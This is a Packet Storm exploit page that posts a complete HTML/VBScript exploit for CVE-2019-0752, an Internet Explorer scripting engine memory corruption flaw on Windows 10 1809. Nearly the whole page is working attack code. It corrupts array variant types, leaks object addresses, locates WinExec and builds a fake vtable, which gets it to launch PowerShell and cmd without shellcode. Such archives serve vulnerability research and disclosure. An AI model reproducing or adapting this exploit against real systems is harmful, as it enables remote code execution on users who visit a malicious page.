what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption
Posted May 24, 2019
Authored by Simon Zuckerbraun

Microsoft Internet Explorer Windows 10 1809 17763.316 scripting engine memory corruption exploit.

tags | exploit
systems | windows
advisories | CVE-2019-0752
SHA-256 | 7d2015c3ac3c61fefec434f05b388f4ccd27c5327a0537ee0a13305ce2eda40c

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Change Mirror Download
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->
<!-- all the way to RCE using no shellcode. -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->
<!-- (h/t: James Forshaw, Google Project Zero) -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
<div id="container1" style="overflow:scroll; width: 10px">
<div id="content1" style="width:5000000px">
Content
</div>
</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
Private mValue
Public Property Let Value(v)
mValue = v
End Property
Public Default Property Get P
P = mValue ' Where to write
End Property
End Class
Sub TriggerWrite(where, val)
Dim v1
Set v1 = document.getElementById("container1")
v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd)
Dim c
Set c = new MyClass
c.Value = where
Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
TriggerWrite addr , (val) AND &hff
TriggerWrite addr + 1, (val\&h100) AND &hff
TriggerWrite addr + 2, (val\&h10000) AND &hff
TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
For i = 0 To Len(str) - 1
TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
Next
End Sub
Function ReadInt32(addr)
WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
Set ar1(gremlin + 1) = obj
LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
' Corrupt vt of one array element (the "gremlin")
TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4
For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
If Not IsEmpty(ar1(i)) Then
gremlin = i
Exit For
End If
Next

If IsEmpty(gremlin) Then
MsgBox "Could not find gremlin"
Exit Sub
End If

For i = 0 To UBound(ar2)
Set ar2(i) = CreateObject("Scripting.Dictionary")
Next

Set dict = ar2(UBound(ar2) / 2)
addressOfDict = LeakAddressOfObject(dict)
vtableOfDict = ReadInt32(addressOfDict)
scrrun = vtableOfDict - &h11fc
kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
winExec = kernel32 + &h5d380

dict.Exists "dummy" ' Make a dispatch call, just to populate pld
' Relocate pld to ensure its address doesn't contain a null byte
pld = ReadInt32(addressOfDict + &h3c)
fakePld = &h28281020
For i = 0 To 3 - 1
WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
Next

fakeVtable = &h28282828 ' ASCII "(((("
For i = 0 To 21
If i = 12 Then ' Dictionary.Exists
fptr = winExec
Else
fptr = ReadInt32(vtableOfDict + 4 * i)
End If
WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
Next

WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""

On Error Resume Next
dict.Exists "dummy" ' Wheeee!!

' A little cleanup to help prevent crashes after the exploit
For i = 1 To 3
WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
Next
Erase Dict
Erase ar2
End Sub
Exploit
</script>
</body>
</html>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close